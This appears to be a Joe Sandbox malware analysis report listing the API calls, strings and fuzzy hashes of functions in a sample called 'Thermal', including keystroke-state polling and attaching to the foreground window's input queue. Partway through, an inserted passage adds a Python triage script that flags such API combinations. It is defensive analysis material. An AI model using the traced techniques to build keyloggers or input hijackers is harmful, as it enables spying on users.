                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 9852e8ed37cdd9ec9a39528ceb7800ff1c67b649721f3339dc9426bfa3a964cf
                                                      • Instruction ID: f8c83fa758c2583c7771d15212572aa392a6a1e5db25fc40dc499c32148c9596
                                                      • Opcode Fuzzy Hash: 9852e8ed37cdd9ec9a39528ceb7800ff1c67b649721f3339dc9426bfa3a964cf
                                                      • Instruction Fuzzy Hash: BD61AF70900249AFDB22EFA4CC88EBFBBB9EB44304F140259F851A7291D731AE45DF24
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001A75CA
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001A75CD
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001A75F1
                                                      • _memset.LIBCMT ref: 001A7602
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001A7614
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001A768C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: 0717ba7371e6878a0bd5e3ee63f24827c7f660b1654216f76f840cc87ceb9a9d
                                                      • Instruction ID: e758d952efeb9d87dcfe98eb3d6eab68eb5be9848d8737d8ddd2d58396d53189
                                                      • Opcode Fuzzy Hash: 0717ba7371e6878a0bd5e3ee63f24827c7f660b1654216f76f840cc87ceb9a9d
                                                      • Instruction Fuzzy Hash: 99618D79904248AFDB11DFA4CC85EEE77F8EB09710F10019AFA14AB2E1D771AE41DB60
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001777DD
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00177836
                                                      • VariantInit.OLEAUT32(?), ref: 00177848
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00177868
                                                      • VariantCopy.OLEAUT32(?,?), ref: 001778BB
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 001778CF
                                                      • VariantClear.OLEAUT32(?), ref: 001778E4
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 001778F1
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001778FA
                                                      • VariantClear.OLEAUT32(?), ref: 0017790C
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00177917
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: f1313fdbae8f51cc8074cb5e53796a571cbad9ad224f7f3edc3b96c36735ebf0
                                                      • Instruction ID: c8744a88f3859157527a4e09f7f7674964a7fb2d521bb9726fefd7b05916b978
                                                      • Opcode Fuzzy Hash: f1313fdbae8f51cc8074cb5e53796a571cbad9ad224f7f3edc3b96c36735ebf0
                                                      • Instruction Fuzzy Hash: C5418335A00219DFCB05DFA4D8489EEBBB9FF18354F00C169E955A7261C730EA95CF90
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00180530
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 001805B1
                                                      • GetKeyState.USER32(000000A0), ref: 001805CC
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 001805E6
                                                      • GetKeyState.USER32(000000A1), ref: 001805FB
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00180613
                                                      • GetKeyState.USER32(00000011), ref: 00180625
                                                      • GetAsyncKeyState.USER32(00000012), ref: 0018063D
                                                      • GetKeyState.USER32(00000012), ref: 0018064F
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00180667
                                                      • GetKeyState.USER32(0000005B), ref: 00180679
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: ae6ded5d8008f5560649ce4a3d05ddf6966906ae13bf2e5704c893a87ee2cbfb
                                                      • Instruction ID: d7fbe49775f1caf287de92c9025abbdb7914a8bd98d5a7006643d45b10cb3a0f
                                                      • Opcode Fuzzy Hash: ae6ded5d8008f5560649ce4a3d05ddf6966906ae13bf2e5704c893a87ee2cbfb
                                                      • Instruction Fuzzy Hash: 7241A5705047CE6DFFB3AA6488043B6BEA06B59304F18415ED5C6465C1FBA49BDCCFA2
                                                      APIs
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • CoInitialize.OLE32 ref: 00198AED
                                                      • CoUninitialize.OLE32 ref: 00198AF8
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,001B3BBC,?), ref: 00198B58
                                                      • IIDFromString.OLE32(?,?), ref: 00198BCB
                                                      • VariantInit.OLEAUT32(?), ref: 00198C65
                                                      • VariantClear.OLEAUT32(?), ref: 00198CC6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: da94288066cf750f106374abed8ccf0300a799bcde4782a3f515af65e8ec5781
                                                      • Instruction ID: ee746e8f7fc6c9306117b4ba7b9ea56ef81365e97e7e73336d1217cadcf94d31
                                                      • Opcode Fuzzy Hash: da94288066cf750f106374abed8ccf0300a799bcde4782a3f515af65e8ec5781
                                                      • Instruction Fuzzy Hash: 706190706087119FCB10DF54D885F9BB7E8EF59714F044859F5869B291CB70ED44CBA2
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0018BB13
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0018BB89
                                                      • GetLastError.KERNEL32 ref: 0018BB93
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0018BC00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 81cc16dbe0140dd744b0200b3fa1a40072fc12754b90f0310688ec8b03fab7f7
                                                      • Instruction ID: 9a6e3c091a9cbca56715aaccd57ea9eeca8b81de4cf401ba0c24447d045ff7b9
                                                      • Opcode Fuzzy Hash: 81cc16dbe0140dd744b0200b3fa1a40072fc12754b90f0310688ec8b03fab7f7
                                                      • Instruction Fuzzy Hash: 0631C135A04209AFCB10EF68C8D5EAEB7B4EF54310F14816AE806D73D5DB709A41CF91
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00179BCC
                                                      • GetDlgCtrlID.USER32 ref: 00179BD7
                                                      • GetParent.USER32 ref: 00179BF3
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00179BF6
                                                      • GetDlgCtrlID.USER32(?), ref: 00179BFF
                                                      • GetParent.USER32(?), ref: 00179C1B
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00179C1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: b92fe9a8c106154d9019df21dd2fcdd1bb0d0512032b08ebfba38a55344d0b87
                                                      • Instruction ID: e920427713ea020530fecfe8e732b4b47e477804506a6cdc7945ad7c68e98f25
                                                      • Opcode Fuzzy Hash: b92fe9a8c106154d9019df21dd2fcdd1bb0d0512032b08ebfba38a55344d0b87
                                                      • Instruction Fuzzy Hash: 6121D3B0900204BFCF05EB60CC85EFEBBB5EFA9310F104256F965972D1DB7459589B20
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00179CB5
                                                      • GetDlgCtrlID.USER32 ref: 00179CC0
                                                      • GetParent.USER32 ref: 00179CDC
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00179CDF
                                                      • GetDlgCtrlID.USER32(?), ref: 00179CE8
                                                      • GetParent.USER32(?), ref: 00179D04
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00179D07
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: 7688e4a3fcc9958c3f72bdd4aee1bcb4cbc6b37f5d9f7a88f6c5fb351efbc8ce
                                                      • Instruction ID: 6955f195240c10bce06b114281ac7af32f818e7ae1aa51fc6bf8bfc26fda24d5
                                                      • Opcode Fuzzy Hash: 7688e4a3fcc9958c3f72bdd4aee1bcb4cbc6b37f5d9f7a88f6c5fb351efbc8ce
                                                      • Instruction Fuzzy Hash: 0B21D0B1A40204BBDF15EBA0CC85EFEBBB9EF98300F104112F95197291DB7589689A20
                                                      APIs
                                                      • GetParent.USER32 ref: 00179D27
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00179D3C
                                                      • _wcscmp.LIBCMT ref: 00179D4E
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00179DC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: b5f86e1c3f4e2ee8930e3d6edd81fd07b256599b9160729a737c7da203bfb1b8
                                                      • Instruction ID: 035cbfbb8a6247e55f172ec4082acd8d578ac54fa16dcbb8b2fe93481fe42279
                                                      • Opcode Fuzzy Hash: b5f86e1c3f4e2ee8930e3d6edd81fd07b256599b9160729a737c7da203bfb1b8
                                                      • Instruction Fuzzy Hash: 111155B6248302BEFA256760FC07DA773ACCF15720F204113FA28A00E1FFA66E550990
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00198FC1
                                                      • CoInitialize.OLE32(00000000), ref: 00198FEE
                                                      • CoUninitialize.OLE32 ref: 00198FF8
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 001990F8
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00199225
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,001B3BDC), ref: 00199259
                                                      • CoGetObject.OLE32(?,00000000,001B3BDC,?), ref: 0019927C
                                                      • SetErrorMode.KERNEL32(00000000), ref: 0019928F
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0019930F
                                                      • VariantClear.OLEAUT32(?), ref: 0019931F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: 0e93b7bd932672f13e8fee2a2e1a590e7ae603f2db0b9518fb23bf65e2952b0a
                                                      • Instruction ID: 22d8069aceeae31965b9d431efe7be95a404ee926dda5c8f20202baa6d60d80e
                                                      • Opcode Fuzzy Hash: 0e93b7bd932672f13e8fee2a2e1a590e7ae603f2db0b9518fb23bf65e2952b0a
                                                      • Instruction Fuzzy Hash: 4EC133B1608305AFDB00DF68C88496BB7E9FF89348F00491DF98A9B251DB71ED45CB92
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 001819EF
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181A03
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00181A0A
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00180A67,?,00000001), ref: 00181A19
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00181A2B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00180A67,?,00000001), ref: 00181A44
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00180A67,?,00000001), ref: 00181A56
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181A9B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181AB0
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181ABB
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: c448d0b9684593a531815f82098f707f051421b87db6e9091eda46437c9162f2
                                                      • Instruction ID: e579f2ab0b790acae9be60a97e6e4d087b7ee7db9b6bd5a171d30f10ab84ecac
                                                      • Opcode Fuzzy Hash: c448d0b9684593a531815f82098f707f051421b87db6e9091eda46437c9162f2
                                                      • Instruction Fuzzy Hash: 8831BF72501284BFDB15AF94DD84FAA77AEBB58315F104215F808DB590DBB49EC28F50
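The block above (GetCurrentThreadId, GetForegroundWindow, GetWindowThreadProcessId, then repeated AttachThreadInput) is the sequence a process uses to attach its own input queue to the foreground window's thread, which lets it read or override that thread's keyboard state and focus. Reviewing hundreds of such blocks by eye is slow, so the following added example (not Joe Sandbox code, and not part of this report) parses the report's "APIs" blocks in the text shape shown on this page and flags a few API combinations worth triaging first. The sample input is constructed from three blocks on this page; the rule table is the example's own assumption of what an analyst would look for, not something the report states.

```python
"""Parse Joe Sandbox 'APIs' function blocks and flag API combinations for triage.

Added example, not Joe Sandbox code. The rules below are the example's own
triage heuristics (assumption), not verdicts taken from the report.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: three blocks copied in the report's text shape
# (input-queue attach, drive-status probe, COM instantiation).
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 001819EF
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181A03
• GetWindowThreadProcessId.USER32(00000000), ref: 00181A0A
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00180A67,?,00000001), ref: 00181A19
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181ABB
Similarity
• String ID:
• Instruction Fuzzy Hash: 8831BF72501284BFDB15AF94DD84FAA77AEBB58315F104215F808DB590DBB49EC28F50
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0018BB13
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0018BB89
• GetLastError.KERNEL32 ref: 0018BB93
• SetErrorMode.KERNEL32(00000000,READY), ref: 0018BC00
Similarity
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• Instruction Fuzzy Hash: 0631C135A04209AFCB10EF68C8D5EAEB7B4EF54310F14816AE806D73D5DB709A41CF91
APIs
  • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
• CoInitialize.OLE32 ref: 00198AED
• CoCreateInstance.OLE32(?,00000000,00000017,001B3BBC,?), ref: 00198B58
• IIDFromString.OLE32(?,?), ref: 00198BCB
Similarity
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• Instruction Fuzzy Hash: 706190706087119FCB10DF54D885F9BB7E8EF59714F044859F5869B291CB70ED44CBA2
"""

# One API line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then "ref: <address>".
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: str
    ref: str
    subcall: bool  # True when the report attributes the call to a callee


@dataclass
class FuncBlock:
    calls: list[Call] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fuzzy_hash: str = ""

    def direct_apis(self) -> set[str]:
        # Only calls made by this function itself, not by its subcalls.
        return {c.api for c in self.calls if not c.subcall}


def parse_blocks(text: str) -> list[FuncBlock]:
    blocks: list[FuncBlock] = []
    cur: FuncBlock | None = None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":            # each function block opens with this header
            cur = FuncBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            cur.calls.append(Call(m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"] is not None))
        elif s.startswith("• String ID:"):
            val = s[len("• String ID:"):].strip()
            cur.strings = val.split("$") if val else []   # '$' separates strings
        elif s.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = s.split(":", 1)[1].strip()
    return blocks


def has_all(*apis: str):
    want = set(apis)
    return lambda b: want <= b.direct_apis()


def silent_drive_probe(b: FuncBlock) -> bool:
    # SetErrorMode(1) is SEM_FAILCRITICALERRORS: suppresses the "no disk" dialog
    # so removable drives can be probed without the user noticing.
    quiet = any(c.api == "SetErrorMode" and c.args.split(",")[0] == "00000001" for c in b.calls)
    return quiet and "GetDiskFreeSpaceW" in b.direct_apis()


# (rule name, predicate over a block, analyst-facing reason) -- assumptions
RULES = [
    ("input-focus hijack", has_all("GetForegroundWindow", "AttachThreadInput"),
     "attaches to the foreground window's input queue: focus steal / key state read"),
    ("keystroke polling", has_all("GetKeyState"), "polls key state outside a message loop"),
    ("silent drive probe", silent_drive_probe, "enumerates drive status with error dialogs suppressed"),
    ("COM instantiation", has_all("CoCreateInstance", "IIDFromString"),
     "instantiates a COM object from a runtime-built CLSID/IID string"),
]


def triage(blocks: list[FuncBlock]) -> list[dict]:
    findings = []
    for i, b in enumerate(blocks):
        for name, pred, why in RULES:
            if pred(b):
                findings.append({"block": i, "rule": name, "why": why,
                                 "refs": [c.ref for c in b.calls if not c.subcall],
                                 "fuzzy_hash": b.fuzzy_hash, "strings": b.strings})
    return findings


if __name__ == "__main__":
    for f in triage(parse_blocks(SAMPLE)):
        print(f"block {f['block']} @ {f['refs'][0]}: {f['rule']} ({f['why']}) strings={f['strings']}")
```

Feed the whole report text to parse_blocks in place of SAMPLE to cover every function; the refs give you the address to jump to in the dump, and the fuzzy hash lets you de-duplicate blocks that are the same code emitted at two sites (this page has two ComboBox/ListBox blocks with identical API IDs but different hashes, which the hash keeps apart correctly). Subcall entries are parsed but excluded from direct_apis so a rule fires on the function that actually makes the call.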
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 0012260D
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00122617
                                                      • SetBkMode.GDI32(?,00000001), ref: 0012262C
                                                      • GetStockObject.GDI32(00000005), ref: 00122634
                                                      • GetClientRect.USER32(?), ref: 0015C0FC
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0015C113
                                                      • GetWindowDC.USER32(?), ref: 0015C11F
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0015C12E
                                                      • ReleaseDC.USER32(?,00000000), ref: 0015C140
                                                      • GetSysColor.USER32(00000005), ref: 0015C15E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                      • String ID:
                                                      • API String ID: 3430376129-0
                                                      • Opcode ID: 7dcdac1b62f7c296fa243bbdcfa72629155901a37f54425471593486209c30e4
                                                      • Instruction ID: 52b8f0ff08c35dd9945ec59c67621a5740fdbd8b73688445cfd8fdcb2ada1996
                                                      • Opcode Fuzzy Hash: 7dcdac1b62f7c296fa243bbdcfa72629155901a37f54425471593486209c30e4
                                                      • Instruction Fuzzy Hash: 26115E31500205FFDB625FA4EC48BEA7BB1EB08322F104365FA65994E1CB3149A1EF50
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0012ADE1
                                                      • OleUninitialize.OLE32(?,00000000), ref: 0012AE80
                                                      • UnregisterHotKey.USER32(?), ref: 0012AFD7
                                                      • DestroyWindow.USER32(?), ref: 00162F64
                                                      • FreeLibrary.KERNEL32(?), ref: 00162FC9
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00162FF6
                                                      Strings
